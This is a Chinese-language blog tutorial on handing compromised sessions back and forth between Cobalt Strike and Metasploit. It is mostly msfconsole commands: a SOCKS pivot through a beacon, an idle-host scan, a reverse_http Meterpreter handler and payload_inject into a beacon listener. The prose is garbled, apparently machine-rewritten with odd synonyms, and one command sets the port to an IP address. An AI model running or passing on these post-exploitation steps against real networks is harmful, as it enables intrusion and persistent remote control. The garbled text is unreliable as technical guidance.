本文由 發(fā)布,轉(zhuǎn)載請注明出處,如有問題請聯(lián)系我們! 發(fā)布時間: 2021-08-11 Cobaltstrike與MSF會話派生
加載中Cobaltstrike與MSF對話繼承
序言
一般在滲入的全過程中,Get到shell以后一般來說我很喜歡發(fā)布到Cobaltstrike,可是Cobaltstrike的對話是60S升級一次,有時作用也并沒有MSF健全(我的軟件不足強大嘿嘿),那麼今天我提前準備紀錄一下怎樣完成Cobaltstrike與MSF的連動,而且在下面2~3篇文章內(nèi)容里,我提前準備主要講一下隧道施工技術(shù)性,尤其是SSH隧道施工技術(shù)性、SOCK4隧道施工技術(shù)性、SOCK5隧道施工技術(shù)性。
文章正文
Cobastrike構(gòu)建SockS隧道施工
最先Cobaltstrike獲得一個對話,隨后構(gòu)建SockS。
隨后再view里尋找Proxy Pivots,點一下Tunnel查詢網(wǎng)絡(luò)設(shè)置。
開啟Metasploit,設(shè)定Socks代理商
msf6 > setg Proxies socks4:192.168.37.129:8265 //設(shè)定走Cobaltstrike的代理商安全通道
Proxies => socks4:192.168.37.129:8265
msf6 > setg ReverseAllowProxy true //設(shè)定容許雙重安全通道
ReverseAllowProxy => true
msf6 > use auxiliary/scanner/ip/ipidseq //設(shè)定找尋空余服務(wù)器
msf6 auxiliary(scanner/ip/ipidseq) > show options
msf6 auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.37.128-135
RHOSTS => 192.168.37.128-135
msf6 auxiliary(scanner/ip/ipidseq) > run
發(fā)覺取得成功掃描儀到空余服務(wù)器:
Cobaltstrike繼承對話
當Cobaltstrike獲得到發(fā)布服務(wù)器后,有時必須傳送對話到MSF,實際操作以下:
最先創(chuàng)建新的Foreign HTTP竊聽器,設(shè)定IP為MSF接受的IP,設(shè)定Port是一會兒MSF監(jiān)視的端口號
隨后開啟MSF,設(shè)定好竊聽器:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload Windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.37.134
lhost => 192.168.37.134
msf6 exploit(multi/handler) > set lport 8088
lport => 8088
msf6 exploit(multi/handler) > run -j
隨后開啟Cobaltstrike,分享對話,方式 以下,在對話欄里挑選spawn,挑選payload為剛剛設(shè)定的MSFpayload,挑選Choose后Metasploit接受到對話。
Metasploit繼承對話
假如Metasploit早已獲得到一個對話,能夠根據(jù)payload_inject控制模塊開展對話繼承,將對話傳送到Cobaltstrike。
這兒我試著首先用MSF開展總流量數(shù)據(jù)加密,再開展對話繼承,實際可參考blog:https://www.cnblogs.com/culin/#/c/subject/p/15119863.html。
實際操作以下,最先Cobaltstrike創(chuàng)建新Becon HTTP的竊聽器,設(shè)定好監(jiān)視的IP和Port
隨后獲得到MSF的對話后,必須啟用payload_inject控制模塊,方式 以下
msf6> use exploit/windows/local/payload_inject
msf6> set payload windows/meterpreter/reverse_http //留意payload的配對
msf6> set session 2 //必須分享對話的SESSION
msf6> set lhost 192.168.34.129 //設(shè)定必須分享的IP
msf6> set lport 192.168.34.129 //設(shè)定必須分享的port
msf6> run //逐漸分享
能夠取得成功見到對話就分享成功了:
這時Cobaltstrike的對話也會被數(shù)據(jù)加密,更為的安全性一。